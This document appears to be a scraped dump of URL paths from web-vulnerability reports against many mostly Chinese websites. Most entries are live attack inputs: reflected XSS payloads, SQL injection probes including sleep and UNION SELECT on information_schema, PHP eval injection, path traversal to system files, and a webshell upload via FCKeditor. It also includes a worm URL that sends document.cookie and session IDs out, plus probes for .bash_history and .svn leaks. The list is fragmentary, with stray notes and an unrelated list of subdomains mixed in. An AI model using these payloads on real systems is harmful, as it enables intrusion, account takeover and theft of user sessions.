/list/nodeIdandCategory/?page=2&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%286236611%29%3B%3C/script%3E&name=资讯 /list/category/?page=6&categoryId=1318&name=%22%3E%3Cscript%3Ealert%282507508%29%3B%3C/script%3E /list/nodeIdandCategory/?page=4&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%288829450%29%3B%3C/script%3E&name=资讯 /list/category/?page=8&categoryId=1318&name=%22%3E%3Cscript%3Ealert%285713857%29%3B%3C/script%3E /list/nodeIdandCategory/?page=9&nodeId=1036&nodeId1=&nodeId2=&categoryId=%22%3E%3Cscript%3Ealert%288393646%29%3B%3C/script%3E&name=资讯 /list/nodelevel2andCategory/?page=1&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%287912834%29%3B%3C/script%3E&name=评测 /list/nodeIdandCategory/?page=5&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%285287936%29%3B%3C/script%3E /list/nodeIdandCategory/?page=3&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%287912834%29%3B%3C/script%3E /list/nodeIdandCategory/?page=8&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%281745332%29%3B%3C/script%3E /list/nodeIdandCategory/?page=6&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%283272209%29%3B%3C/script%3E /list/nodeIdandCategory/?page=7&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%282794155%29%3B%3C/script%3E /list/nodeIdandCategory/?page=2&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%280728708%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=2&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%287853894%29%3B%3C/script%3E&name=评测 /list/nodeIdandCategory/?page=9&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%285024590%29%3B%3C/script%3E /list/nodeIdandCategory/?page=4&nodeId=1036&nodeId1=&nodeId2=&categoryId=1476&name=%22%3E%3Cscript%3Ealert%282627992%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=1&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%283118875%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=2&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%287697834%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=3&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%283663536%29%3B%3C/script%3E&name=评测 /list/nodelevel2andCategory/?page=5&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%285417773%29%3B%3C/script%3E&name=评测 /list/nodelevel2andCategory/?page=4&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%286561767%29%3B%3C/script%3E&name=评测 /list/nodelevel2andCategory/?page=3&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%288134578%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=6&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%287316208%29%3B%3C/script%3E&name=评测 /list/nodelevel2andCategory/?page=7&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%281158619%29%3B%3C/script%3E&name=评测 /oa/news/?page=2&categoryId=1390&name=%22%3E%3Cscript%3Ealert%285216206%29%3B%3C/script%3E /oa/news/?page=1&categoryId=1390&name=%22%3E%3Cscript%3Ealert%285216206%29%3B%3C/script%3E /oa/news/?page=5&categoryId=1390&name=%22%3E%3Cscript%3Ealert%281158619%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=9&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%280968064%29%3B%3C/script%3E&name=评测 /oa/news/?page=6&categoryId=1390&name=%22%3E%3Cscript%3Ealert%283783416%29%3B%3C/script%3E /oa/news/?page=8&categoryId=1390&name=%22%3E%3Cscript%3Ealert%283783416%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=5&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%287900657%29%3B%3C/script%3E /oa/news/?page=4&categoryId=1390&name=%22%3E%3Cscript%3Ealert%281712741%29%3B%3C/script%3E /oa/news/?page=3&categoryId=1390&name=%22%3E%3Cscript%3Ealert%286553212%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=8&nodeIdLevel2=&categoryId=%22%3E%3Cscript%3Ealert%283901788%29%3B%3C/script%3E&name=评测 /list/nodelevel2andCategory/?page=4&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%286553212%29%3B%3C/script%3E /oa/news/?page=7&categoryId=1390&name=%22%3E%3Cscript%3Ealert%283901788%29%3B%3C/script%3E /oa/news/?page=9&categoryId=1390&name=%22%3E%3Cscript%3Ealert%281396990%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=6&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%284567763%29%3B%3C/script%3E /oa/topic/?page=1&nodeId=1084&nodeId1=1068&nodeId2=%22%3E%3Cscript%3Ealert%288208562%29%3B%3C/script%3E&name=专题 /oa/topic/?page=2&nodeId=1084&nodeId1=1068&nodeId2=%22%3E%3Cscript%3Ealert%280414162%29%3B%3C/script%3E&name=专题 /list/nodelevel2andCategory/?page=9&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%281559259%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=7&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%288208562%29%3B%3C/script%3E /6.php?op=d&oby=n&cID=6&bID=0&pr=0&t1=0&t2=0&bigCID= /oa/topic/?page=1&nodeId=1084&nodeId1=1068&nodeId2=&name=%22%3E%3Cscript%3Ealert%288580820%29%3B%3C/script%3E /oa/topic/?page=2&nodeId=1084&nodeId1=1068&nodeId2=&name=%22%3E%3Cscript%3Ealert%286519119%29%3B%3C/script%3E /list/nodelevel2andCategory/?page=8&nodeIdLevel2=&categoryId=1391&name=%22%3E%3Cscript%3Ealert%284483179%29%3B%3C/script%3E /netdiy/cgfa/?page=2&categoryId=1492&nodeId=526&name=%22%3E%3Cscript%3Ealert%287947574%29%3B%3C/script%3E /netdiy/cgfa/?page=1&categoryId=1492&nodeId=526&name=%22%3E%3Cscript%3Ealert%287991562%29%3B%3C/script%3E /printer/complexlist/index.php?categoryId=1390&typeId=105&name=%22%3E%3Cscript%3Ealert%289181646%29%3B%3C/script%3E /list/nodelevel2/?page=3&nodeIdLevel2=%22%3E%3Cscript%3Ealert%284068120%29%3B%3C/script%3E&name=整机 /list/nodelevel2/?page=1&nodeIdLevel2=%22%3E%3Cscript%3Ealert%286793114%29%3B%3C/script%3E&name=整机 /list/nodelevel2/?page=7&nodeIdLevel2=%22%3E%3Cscript%3Ealert%280371727%29%3B%3C/script%3E&name=整机 /list/nodelevel2/?page=8&nodeIdLevel2=%22%3E%3Cscript%3Ealert%288908135%29%3B%3C/script%3E&name=整机 /list/nodelevel2/?page=5&nodeIdLevel2=%22%3E%3Cscript%3Ealert%280935806%29%3B%3C/script%3E&name=整机 /list/nodelevel2/?page=6&nodeIdLevel2=%22%3E%3Cscript%3Ealert%286249206%29%3B%3C/script%3E&name=整机 /list/nodelevel2/?page=2&nodeIdLevel2=%22%3E%3Cscript%3Ealert%289364050%29%3B%3C/script%3E&name=整机 /list/nodelevel2/?page=4&nodeIdLevel2=%22%3E%3Cscript%3Ealert%282605810%29%3B%3C/script%3E&name=整机 /list/nodelevel2/?page=9&nodeIdLevel2=%22%3E%3Cscript%3Ealert%281125890%29%3B%3C/script%3E&name=整机 /oa/printscroll/list/?page=2&categoryId=105&name=%22%3E%3Cscript%3Ealert%285486687%29%3B%3C/script%3E /oa/printscroll/list/?page=4&categoryId=105&name=%22%3E%3Cscript%3Ealert%282017422%29%3B%3C/script%3E /oa/printscroll/list/?page=6&categoryId=105&name=%22%3E%3Cscript%3Ealert%280557256%29%3B%3C/script%3E /list/nodelevel2/?page=1&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%285213121%29%3B%3C/script%3E /oa/printscroll/list/?page=5&categoryId=105&name=%22%3E%3Cscript%3Ealert%286369119%29%3B%3C/script%3E /list/nodelevel2/?page=5&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%286369119%29%3B%3C/script%3E /list/nodelevel2/?page=8&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%282780518%29%3B%3C/script%3E /oa/printscroll/list/?page=3&categoryId=105&name=%22%3E%3Cscript%3Ealert%289007323%29%3B%3C/script%3E /list/nodelevel2/?page=3&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%286369119%29%3B%3C/script%3E /list/nodelevel2/?page=2&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%286932305%29%3B%3C/script%3E /oa/printscroll/list/?page=1&categoryId=105&name=%22%3E%3Cscript%3Ealert%286932305%29%3B%3C/script%3E /list/nodelevel2/?page=7&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%282725605%29%3B%3C/script%3E /oa/printscroll/list/?page=7&categoryId=105&name=%22%3E%3Cscript%3Ealert%287077311%29%3B%3C/script%3E /list/nodelevel2/?page=6&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%280764242%29%3B%3C/script%3E /list/nodelevel2/?page=4&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%283870622%29%3B%3C/script%3E /oa/printscroll/list/?page=8&categoryId=105&name=%22%3E%3Cscript%3Ealert%289922749%29%3B%3C/script%3E /oa/printscroll/list/?page=9&categoryId=105&name=%22%3E%3Cscript%3Ealert%286105773%29%3B%3C/script%3E /printer/printer/?page=1&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%284679923%29%3B%3C/script%3E /printer/printer/?page=2&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%286225687%29%3B%3C/script%3E /printer/printer/?page=3&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%280068185%29%3B%3C/script%3E /4.php?op=d&oby=n&cID=4&bID=0&pr=0&t1=0&t2=0&t3=0&bigCID= /printer/printer/?page=6&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%286594645%29%3B%3C/script%3E /printer/printer/?page=7&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%283004193%29%3B%3C/script%3E /printer/printer/?page=8&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%283139281%29%3B%3C/script%3E /printer/scrollplot/list/?page=3&categoryId=104&name=%22%3E%3Cscript%3Ealert%288307235%29%3B%3C/script%3E /printer/scrollplot/list/?page=2&categoryId=104&name=%22%3E%3Cscript%3Ealert%286881304%29%3B%3C/script%3E /printer/scrollplot/list/?page=1&categoryId=104&name=%22%3E%3Cscript%3Ealert%281758995%29%3B%3C/script%3E /printer/scrollplot/list/?page=4&categoryId=104&name=%22%3E%3Cscript%3Ealert%282728770%29%3B%3C/script%3E /printer/printer/?page=4&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%284429876%29%3B%3C/script%3E /oa/category/?page=1&categoryId=165&name=%22%3E%3Cscript%3Ealert%288535585%29%3B%3C/script%3E /printer/scrollplot/list/?page=6&categoryId=104&name=%22%3E%3Cscript%3Ealert%288535585%29%3B%3C/script%3E /printer/scrollplot/list/?page=7&categoryId=104&name=%22%3E%3Cscript%3Ealert%283948748%29%3B%3C/script%3E /oa/category/?page=2&categoryId=165&name=%22%3E%3Cscript%3Ealert%282467172%29%3B%3C/script%3E /oa/category/?page=3&categoryId=165&name=%22%3E%3Cscript%3Ealert%287197618%29%3B%3C/script%3E /printer/scrollplot/list/?page=8&categoryId=104&name=%22%3E%3Cscript%3Ealert%286619854%29%3B%3C/script%3E /printer/scrollplot/list/?page=9&categoryId=104&name=%22%3E%3Cscript%3Ealert%287763847%29%3B%3C/script%3E /printer/scrollplot/list/?page=5&categoryId=104&name=%22%3E%3Cscript%3Ealert%282313591%29%3B%3C/script%3E /printer/printer/?page=9&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%284557157%29%3B%3C/script%3E /projector/complexlist/index.php?categoryId=1390&typeId=119&name=%22%3E%3Cscript%3Ealert%287327032%29%3B%3C/script%3E /list/nodelevel2/?page=9&nodeIdLevel2=259&name=%22%3E%3Cscript%3Ealert%289602106%29%3B%3C/script%3E /projector/projectiondisplay/list/?page=2&categoryId=119&name=%22%3E%3Cscript%3Ealert%282650345%29%3B%3C/script%3E /printer/printer/?page=5&categoryId=155,156,158,101&name=%22%3E%3Cscript%3Ealert%280697323%29%3B%3C/script%3E /projector/projectiondisplay/list/?page=3&categoryId=119&name=%22%3E%3Cscript%3Ealert%289738343%29%3B%3C/script%3E /netdiy/complexlist/index.php?categoryId=1390&typeId=46&name=%22%3E%3Cscript%3Ealert%280697323%29%3B%3C/script%3E /projector/projectiondisplay/list/?page=4&categoryId=119&name=%22%3E%3Cscript%3Ealert%288111164%29%3B%3C/script%3E /projector/projectiondisplay/list/?page=7&categoryId=119&name=%22%3E%3Cscript%3Ealert%282589580%29%3B%3C/script%3E /projector/projectiondisplay/list/?page=1&categoryId=119&name=%22%3E%3Cscript%3Ealert%281160910%29%3B%3C/script%3E /projector/projectiondisplay/list/?page=9&categoryId=119&name=%22%3E%3Cscript%3Ealert%284797974%29%3B%3C/script%3E /projector/projectiondisplay/list/?page=8&categoryId=119&name=%22%3E%3Cscript%3Ealert%285831619%29%3B%3C/script%3E /printer/news/?page=3&categoryId=1390&name=%22%3E%3Cscript%3Ealert%289093758%29%3B%3C/script%3E /netdiy/router/list/?page=1&categoryId=46&nodeId=525&name=%22%3E%3Cscript%3Ealert%281963633%29%3B%3C/script%3E /netdiy/router/list/?page=3&categoryId=46&nodeId=525&name=%22%3E%3Cscript%3Ealert%281086207%29%3B%3C/script%3E /projector/projectiondisplay/list/?page=6&categoryId=119&name=%22%3E%3Cscript%3Ealert%285540144%29%3B%3C/script%3E /printer/news/?page=6&categoryId=1390&name=%22%3E%3Cscript%3Ealert%289823184%29%3B%3C/script%3E /printer/news/?page=4&categoryId=1390&name=%22%3E%3Cscript%3Ealert%289472807%29%3B%3C/script%3E /printer/news/?page=5&categoryId=1390&name=%22%3E%3Cscript%3Ealert%282526189%29%3B%3C/script%3E /netdiy/router/list/?page=2&categoryId=46&nodeId=525&name=%22%3E%3Cscript%3Ealert%288885216%29%3B%3C/script%3E /printer/news/?page=2&categoryId=1390&name=%22%3E%3Cscript%3Ealert%289366117%29%3B%3C/script%3E /printer/news/?page=7&categoryId=1390&name=%22%3E%3Cscript%3Ealert%284101048%29%3B%3C/script%3E /printer/news/?page=9&categoryId=1390&name=%22%3E%3Cscript%3Ealert%285824625%29%3B%3C/script%3E /printer/news/?page=1&categoryId=1390&name=%22%3E%3Cscript%3Ealert%285824625%29%3B%3C/script%3E /printer/news/?page=8&categoryId=1390&name=%22%3E%3Cscript%3Ealert%283762807%29%3B%3C/script%3E /oa/complexlist/?page=2&categoryId=1390&typeId=105&name=%22%3E%3Cscript%3Ealert%284092575%29%3B%3C/script%3E /oa/printscroll/?page=2&categoryId=155,156,158,160,116&name=%22%3E%3Cscript%3Ealert%288331335%29%3B%3C/script%3E /2007/admin/ /2007/manage/ /2007/manage/ /corpCenter/admin/ /corpCenter/admin/login.asp /2007/upload.php /viewthread.php?tid=2613766 /default/pwdResetRequestByEmail.do?uid=1000244181&code=9qxHvn7L /tool/qqworm.js /bugtest/qqworm.php?sid="+EQQ.getPsessionid()+"&cid="+EQQ.Model.ChatMsg.getClientidFromRpc()+"&cookie="+encodeURIComponent(document.cookie) /channel/get_online_buddies2?clientid=".$clientid."&psessionid=".$psessionid,"GET /proxy.html?v=20110331002&callback=1&id=2 /channel/send_buddy_msg2","POST /proxy.html?v=20110331002&callback=1&id=2 /subread.php?sid=1094 /subread.php?sid=1094%20and%201=1 /subread.php?sid=1094%20and%201=2 /bonus.php?subject=%22;%3C/script%3E%3Cscript%3Ealert%28301%29;%3C/script%3E& /cms/ /cms/editor/eWebEditor /bjiaportal/ /bjiaportal/wafplatform/portletmanage.do /bjiaportal/wafplatform/portletmanage.do?funcid=showGroupTree /front/info/information_download.jsp?FileName=100232012576180.pdf&name=%B9%D8%D3%DA%BE%AF%CC%E8%BC%D9%C3%B0%CA%A1%B7%A2%D5%B9%B8%C4%B8%EF%CE%AF%C3%FB%D2%E5%BD%F8%D0%D0%D5%A9%C6%AD%B5%C4%CD%A8%D6%AA.pdf /hyzq/ghongyuan/HBdownload.jsp / https://passport.youtx.com/user/regist/ /ztc/index.php/m/a/p/${@phpinfo() /ztc/index.php/m/a/p/${@phpinfo() /index.php/Public/login/p/${@phpinfo() /itoperation/Main/Login.aspx /nq/mc/1_0_0/us/pim/userstatus_2.swf?url=http://www.baidu.com&callback=function(){alert(0)}() /pb/webplayer/0.9.32/flash/swfproxy.swf?onLoad=alert%280%29 /.svn/entries /phpinfo.php /info.php /info.php /upload/ / /prws/display.aspx?transtr=420000A1A7A17AA18A37A29&newsid=2635 /portal/ /test.php?c='+document.cookie// /test.php?c='+document.cookie// /topic/%E7%94%B5%E5%BD%B1\r\n /follow /people/yolfilm/search?pq=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&type=all /search?q=%22/%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E /news/notice_view.php?id=31 /news/ccbnews_view.php?id=14 /viewthread.php?tid=40986&pid=753324&page=1&extra=page%3D1#pid753324 /account/password.php?act=step1_1&sess=37RH%2FtIcJ10k6yDePpel4TkSy4qjayXDn2VWybxgyns%3D /QuestionDetail.aspx?wID=201206202147245 /share/share.php?url=http://1 www.Xhm1n9.com\\a\\b\\x.js' /echo/eclipse/viewas.asp?id=20'%20and%20@@version=1-- /prog/wapsite/sports/data/account.php?match_id=48135%20and%201=2&league_type_id=7 /prog/wapsite/sports/data/account.php?match_id=48135%20and%201=1&league_type_id=7 /prog/wapsite/sports/data/account.php?match_id=48135%20and%20sleep%28100%29&league_type_id=7 / / /view/c03ec960f5335a8102d22012.html / /list.php?id=64839 /list.php?id=64839 /list.php?id=64839 //space.php?uid=6843194&do=blog&id=289343 /cn/searchresult.jsp?keywords=x&srchfield=%28case%20when%281=1%29%20then%20topic%20else%20content%20end%29&x=52&y=3 /cn/searchresult.jsp?keywords=x&srchfield=%28case%20when%281=2%29%20then%20topic%20else%20content%20end%29&x=52&y=3 /cn/searchresult.jsp?keywords=x&srchfield=%28case%20when%28exists%28select%20*%20from%20mysql.user%29%29%20then%20topic%20else%20content%20end%29&x=52&y=3 /index.php/module/action/param1/${@eval%28$_POST[301]%29 www.czvision.com.cn /search?q=%22+onmouseover%3Dalert%28%2Fxss%2F%29+s www.lpboke.com www.lpboke.com /?product-gnotify /?product-gnotify /themes/文件名称/你的木马名称 /emall/SNOrderCenterLifeDetailView?orderId=747254 /js/gome/.svn/entries /js/widget/.svn/entries /AboutUs/NewsLook.php?id=32 /AboutUs/NewsLook.php?id=32 /manager/Default.php /cyportal1.3/template/site00_article_01.jsp?parent_id=402881f9286b086c01286b2fc68e0037&parentType=0&a1b2cc=7xaac&article_id=297edff731cc94fe0135c32e2ba05334 /cyportal1.3/处登陆管理员账户,但是威胁不大,只能修改管理员密码和个人信息。 /app/logo_2010/singlework.php?id=FTC20149 /?m=news&id=152 /?m=cosPlay&id=954 /?action=subscribeinfo&id=46 Object(Db_MysqlClass)- /www/wwwroot/fahao2.07073.com/lib/db/mysqlclass.php Object(Db_MysqlClass)- /www/wwwroot/fahao2.07073.com/lib/db/mysqlclass.php Object(Db_MysqlClass)- /www/wwwroot/fahao2.07073.com/app/controller/index.php Object(Controller_Index)- /www/wwwroot/fahao2.07073.com/lib/dispatcher.php Object(dispatcher)- /www/wwwroot/fahao2.07073.com/lib/dispatcher.php Object(dispatcher)- /www/wwwroot/fahao2.07073.com/www/index.php /?m=news&id=264 /downit.php?id=58038 /comment/add /question/20305009?nr=1¬i_id=20220307 /search.action /singer/album.php?zid=168845&zname[$wooyun]=1 /index.action /im5/login/login.action?t=1340348627348 /i?ct=6&bt=1&tn=baidudetaillost&isign=%22%2balert('wooyun')%2b%22&tsign=690493407,2670508243 /i?ct=7&bt=3&tn=baiduimgdata&isign="+alert('wooyun')+ /app/news/show.php?id=3156 /special/qzone/info/_0.html /special/vip/info/_0.html /Team/index/ /resin-doc/examples/quercus-module/viewfile?file=hello.php /resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml channel.3g.youku.com/webapps/resin-doc/examples/quercus-module/ /pub/submit/createmusic?albumname=Sirens&albumpic1=http://t.cn/z&albumuserpic2=http://t.cn/z&content=aaaaaa&from=ting&private=0&private1=0&qing_request_source=&songid=1&songname=bbbb&songuname=cc&tags[]=dd&url= http://mail.wo.com.cn/mail/login.action /index.action /cyportal/downloadtag.jsp?fileName=*.*&filePath=*/*.* /cyportal.1/downloadtag.jsp?fileName=*.*&filePath=*/*.* /cyportal1.3/downloadtag.jsp?fileName=*.*&filePath=*/*.* /emall/Search?searchKeywords=%3C/title%3E%3Cembed/src=//tmxk.org%3E /zhishitang/qa/answerInit.action?flag=0&artID=341908 /mibao/controller/mob/index.jsp /post/2012-06-23/40028420636 /fcg-bin/cgi_friend_gain_leidou.fcg?userid= house365.com txt / /ids/admin/login.jsp /index.action /Index.aspx?pclass=%25u5730%25u57DF&attributeID=184%7C234%7C229%7C229%7C236&key=%7C-%7CBOSS%7C%7C%&cclass=BOSS&type=guaiwu&GameCateID=94%7C94%7C94%7C94%7C94 /ptr/spells.php?c=9 /ptr/spells.php?c=9 www.un.org.cn www.un.org.cn /media/player.swf?debug=function(){alert(/YU/) /76165512_d.html /login-share/logout/logout.action /login-share/logout/logout.action /Include/Api/admin.php /common/images/.svn/entries /.bash_history www.changdu www.chaohu www.chifeng www.chizhou www.chongzuo www.chuzhou www.cq www.dalian www.daqing www.daxinganling www.dongying www.eerduosi www.enshi www.ezhou www.fangchenggang www.fj www.futian www.fuyang www.fuzhou www.ganzhou www.guigang www.guilin www.gx www.ha www.haerbin www.haikou www.hangzhou www.hanzhong www.hebi www.hebi www.hechi www.hegang www.heihe www.henan www.heze www.hezhou www.hlj www.huaibei www.huainan www.huanggang www.huangshi www.hubei www.huhehaote www.hulunbeier www.huzhou www.jiamusi www.jian www.jianghanyoutian www.jiaozuo www.jiaxing www.jinan www.jingdezhen www.jingmen www.jingzhou www.jinhua www.jining www.jiujiang www.jixi www.jiyuan www.js www.jx www.kaifeng www.kaifeng www.laibin www.laibin www.lasa www.liaocheng www.linyi www.linzhi www.liuzhou www.ln www.longyan www.luan www.luohe www.luoyang www.maanshan www.mudanjiang www.nanchang www.nanning www.nanping www.nanyang www.naqu www.ningbo www.ningde www.nmg www.nx www.pingdingshan www.pingxiang www.putian www.puyang www.qh www.qianjiang www.qinghai www.qinzhou www.qiqihaer www.qitaihe www.quanzhou www.quzhou www.rika www.rikaze www.sanmenxia www.sanming www.sanya www.sh www.shangluo www.shangqiu www.shangrao www.shannan www.shaoxing www.shennongjia www.shenyang www.shiyan www.shuangyashan www.suihua www.suizhou www.suzhou www.taian www.taizhou www.tianmen www.tj www.tongchuan www.tongliao www.tongling www.weifang www.weinan www.wenzhou www.wuhai www.wuhan www.wuhu www.wulanchabu www.wulumuqi www.wuzhou www.xiamen www.xian www.xiangan www.xiangfan www.xiangyang www.xianning www.xiantao www.xianyang www.xiaogan www.xilinguole www.xingan www.xinxiang www.xinyang www.xinyu www.xjakesu www.xjaletai www.xjbazhou www.xjbozhou www.xjchangji www.xjhami www.xjhetian www.xjkashi www.xjkelamayi www.xjkezhou www.xjshihezi www.xjtacheng www.xjtulufan www.xjwulumuqi www.xjyili www.xuancheng www.xuchang www.xuchang www.xz www.yanan www.yangling www.yantai www.yichang www.yichun www.yichun www.yingtan www.yn www.yulin www.yulin www.yulin www.zaozhuang www.zhangzhou www.zz-police.com www.zhengzhou www.zhoukou www.zhoukou www.zhoushan www.zhumadian www.zhumadian www.zibo www.zj www.zj /crossdomain.xml /news/newslist/?Page[]=1&submit=1 /index.action /index.php /Admin/Article/FileLoad.aspx?FileName=%E9%BB%91%E5%8D%AB%E7%A7%91%E5%8F%91%E3%80%942012%E3%80%95120%E5%8F%B7.doc&URL=96b3346e-3648-410d-8a87-fefcc25a252a.doc /downLoad.jsp?fileName=help.doc /cn2/manage/mobile/active_sms_ajax?mobile_number=xxxxxxxxxxx&flow_type=dna /jsp/download.jsp?filename=iPASS%CA%B9%D3%C3%CA%D6%B2%E1.doc /m /cgi-bin/loginpage?%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26%26"/ http://222.240.193.172/login.aspx /Shop/ShoppingResult.aspx?orderid=83LST96M00DKZLC0,字符型注入啊~ /ReadNews.asp?NewsID=13358 noxss("*//*");xss:ex/*gg*//*/*/pression(if(window.x!=1){alert(document.cookie);window.x=1;}) /user/settings/editprofile.asp /searchresult.jsp?keywords=xxx&srchfield=topic=0x7c /searchresult.jsp?keywords=xxx&srchfield=topic=0x7c /searchresult.jsp?keywords=xxx&srchfield=topic=0x7c /user/home/ /user/profile/ /neworder/confirm_address/ /app/updateUserValidate?type=pwd&email=hello@gmail.com&id=641483319f5dbb10dc20e4c2aac6eab9&num=1340620118434 /music/musicHome.action /login-share/logout/logout.action /login-share/logout/logout.action /mhzx/mzsendcode/insertGroup!list.action /fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ /UserFiles/Image/test.jsp /member/loginAction.do /thread-571-1-1.html。 /Shop/ShoppingResult.aspx?orderid=83LST96M00DKZLC0%27and%201=2%20union%20select%201,2,3,4,5,schema_name,7,8,9,10,11,12%20from%20information_schema.schemata%20limit%201,1%23 /manual/ /manual/index.php /manual/ko/index.php /manual/en/index.php /manual/de/index.php /zh-CN /adduser/chkuuid.asp?uuid=1 www.zyccb.com /app/my/docin/checkOldPwd?password=XXXXXXXXXXX返回的结果来判断用户输入的密码是否为真,ture和false,这个过程存在一定缺陷,在拿到用户COOKIES的情况下,利用穷举或者密码库,很容易就可以测试出用户的原密码。 /app/my/docin/password?fn=update /app/my/docin/password?fn=update /app/my/docin/addConcernUser /app/my/docin/addConcernUser /jsp_cn/userBlog/userdoc/updateaboutme.jsp?content=[在这里输入你想修改的签名 /app/my/docin/reset?newPwd=123456&newPwdAgain=123456 none"/ /infogm.php?cid=&gid=48157 /infogt.php?cid=&gid=48157 /infogm.php?cid=&gid=48157 /infogm.php?cid=&gid=48157 /infogm.php?cid=&gid=48157 /tdxlsqxt/stuClient.shtml?action=afficheDetail&afficheId=61 /CMS/Login.aspx /1.php /account/ajax/add/address /account/addresses http://hbp.happigo.com/ /supplierSeminar/images/login.gif/1.php /newsView.php?sid=&cnid=1456639%20and%20sleep(12)&chid=1_14_3&coid=1_14_3_1&wv=2&v=l&return=channel&fromid=&uc_param_str=dnup /newsView.php?sid=&cnid=1456639 /question/19550238/answer/12202028,自然要看看这个输入地方是否 /question/19555227 /info.php /gpsback/index.action /index.php?m=attachment&c=attachments&a=album_dir&dir=.../../.../.../// /index.php?m=attachment&c=attachments&a=album_load&t=1&dosubmit=true&info[where]=sdfdsss /web/siterank.php?ranktype=unexisting/../../../../../../../../../../windows/System32/drivers/etc/hosts.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.